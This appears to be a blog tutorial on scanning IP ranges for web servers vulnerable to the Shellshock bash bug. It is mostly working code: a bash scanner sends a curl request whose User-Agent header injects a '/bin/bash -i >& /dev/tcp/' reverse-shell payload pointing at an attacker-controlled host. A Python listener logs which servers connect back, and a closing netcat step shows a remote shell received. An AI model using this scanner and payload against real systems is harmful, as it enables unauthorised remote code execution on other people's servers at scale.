As we commented on a previous occasion, it is possible to exploit the bash shock bug on web servers if the execution of the PHP interpreter is done through a wrapper written in bash. However, first we must locate such servers. This time we will use exactly the same technique explained in the previous article, but this time we will not put a netcat on listening to collect the connection, but we will put a Python script that will show us which IPs are trying to connect. This way we will have a script that tries to take advantage of the vulnerability and another that will show where it has been successfully executed.
The script that we will put on listening is:
import socket
s = socket.socket()
print "-- Socket successfully created"
port = 4141
s.bind(('', port))
print "-- Socket binded to %s" %(port)
s.listen(5)
print "-- Socket is listening"
while True:
# Establish connection with client.
c, addr = s.accept()
print '-- Got connection from', addr
c.close()
print '-- Connection closed'
NOTE: This script will be put on listening on port 4141. If someone connects to this port, it will print the IP and close the connection.
The bug checking script is as follows:
#!/bin/bash
clear
echo -e "-----------------------------------------------"
echo -e "| BachShock HTTP Scanner v0.1b, coded by Kr0m |"
echo -e "-----------------------------------------------"
echo -e "++ Remember to put the listening script in the configured port"
echo -e " python2.7 python_server_socket.py "
echo -e " "
if [ $# -ne 2 ]; then
echo -e "-- Invalid number of arguments."
echo -e "bashshock_http_scanner.sh FIRST_IP LAST_IP"
echo -e " "
exit
fi
HOST="192.168.20.1"
PORT="4141"
IP="$1"
IP2="$2"
STAT=1
STAT2=1
if [[ $IP =~ ^[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}$ ]]; then
OIFS=$IFS
IFS='.'
IP=($IP)
IFS=$OIFS
[[ ${IP[0]} -le 255 && ${IP[1]} -le 255 && ${IP[2]} -le 255 && ${IP[3]} -le 255 ]]
STAT=$?
fi
if [ $STAT == '1' ]; then
echo -e "-- First IP: $1 -- INVALID, aborting"
exit
else
echo -e "-- First IP: $1 -- VALID"
fi
if [[ $IP2 =~ ^[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}$ ]]; then
OIFS=$IFS
IFS='.'
IP2=($IP2)
IFS=$OIFS
[[ ${IP2[0]} -le 255 && ${IP2[1]} -le 255 && ${IP2[2]} -le 255 && ${IP2[3]} -le 255 ]]
STAT2=$?
fi
if [ $STAT2 == '1' ]; then
echo -e "-- Second IP: $2 -- INVALID, aborting"
exit
else
echo -e "-- Second IP: $2 -- VALID"
fi
IFS=. read -r a b c d <<< "$1"
INT=$(printf '%d
' "$((a * 256 ** 3 + b * 256 ** 2 + c * 256 + d))")
IFS=. read -r a b c d <<< "$2"
INT2=$(printf '%d
' "$((a * 256 ** 3 + b * 256 ** 2 + c * 256 + d))")
#echo -e "-- INT: $INT"
#echo -e "-- INT2: $INT2"
if [ "$INT2" -ge "$INT" ]; then
echo -e "-- Valid IP Range"
else
echo -e "-- Invalid IP Range, aborting"
exit
fi
echo -e " "
while [ $INT -le $INT2 ]; do
A=$(echo -n $(($(($(($((${INT}/256))/256))/256))%256)).)
B=$(echo -n $(($(($((${INT}/256))/256))%256)).)
C=$(echo -n $(($((${INT}/256))%256)).)
D=$(echo $((${INT}%256)))
echo -e "=============================================================="
echo -e "++ Scanning IP: $A$B$C$D"
curl -m 6 -k -H 'User-Agent: () { :;}; /bin/bash -i >& /dev/tcp/'$HOST'/'$PORT' 0>&1' http://$A$B$C$D/ -s -o /dev/null &
let INT=$INT+1
done
echo -e "=============================================================="
If the script finds any vulnerable server in the console where we have the Python, it will appear something like this:
-- Socket successfully created
-- Socket binded to 4141
-- Socket is listening
-- Got connection from ('192.168.20.27', 60223)
-- Connection closed
We can see how the server 192.168.20.27 is vulnerable to this attack, now we just rerun the attack as in the previous article and we have shell ;)
We put netcat on listening mode:
We exploit the vulnerability:
In the shell with netcat, we receive the remote shell:
nc -l -p 8080
web_prueba@RX3 /var/www/bin/web_pruebas $
This script will only work if the server’s index file is interpreted through the wrapper. It may be the case that the index is an HTML file but has other parts written in PHP, for example.